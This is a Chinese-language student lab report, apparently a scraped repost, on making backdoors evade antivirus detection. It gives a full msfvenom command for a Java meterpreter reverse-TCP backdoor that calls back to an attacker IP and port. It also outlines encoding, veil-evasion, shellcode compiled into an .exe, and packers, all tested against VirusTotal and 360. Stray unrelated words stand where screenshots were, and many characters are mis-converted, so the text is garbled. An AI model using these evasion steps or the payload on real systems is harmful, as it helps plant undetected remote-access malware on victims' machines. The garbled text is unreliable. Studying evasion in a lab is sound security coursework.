将作实验二时生成的后门文件用virustotal网站检测,结果如图:
java
1.1.1正确使用msf编码器
使用msfvenom指令进行屡次编码,结果如图:
shell
1.1.2 msfvenom生成jar之类的其余文件文件
(1)使用msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.91.133 LPORT=5305 x> sxx_backdoor_java.jar
生成jar文件。
检测结果如图所示:编程
(2)生成.apk后门程序
检测结果如图所示:windows
1.1.3使用veil-evasion生成后门程序并检测
启动veil-evasion,输入指令进入配置界面设置反弹链接IP和端口号,而后输入命令生成文件并设置文件名。(文件会保存到默认的路径下)
数组
检测结果以下·:
安全
1.1.4 Shellcode注入
(1)先生成C语言格式的shellcode数组,如图tcp
(2)生成一个.c文件,将生成的shellcode数组写入程序中。
(3)在kali下将这个.c文件编译成为.exe可执行文件
如图:
工具
(4)检测结果如图:
测试
(5)用360查杀,如图:
网站
1.1.5使用加壳工具
加壳可分为三种:
(1)压缩壳
使用指令将.exe可执行文件压缩。
结果如图:
检测结果如图:
验证反弹链接结果:
(2)加密壳
查杀结果:
电脑win7,杀软360安全卫士,版本号11.5.0.2002
截图:
(1)杀软是如何检测出恶意代码的?
根据行为进行检测
根据文件的特征值进行分析
启发式恶意软件检测
(2)免杀是作什么?
经过一些方法,使恶意文件不被杀软查出来。
(3)免杀的基本方法有哪些?
加壳、修改文件的特征码等。
不能。恶意代码层出不穷,咱们须要常常更新杀软,这样咱们才能用杀软防护一些没有见过的恶意代码。
本次实验我主要是卡在了veil软件的安装,我安装了好长时间。本次的实验我最大的收获是提升了本身对于恶意软件的防范意识和能力,认识到了杀软并非万能的,因此咱们在平常生活中,若是须要下载软件,最好仍是要到官网下载。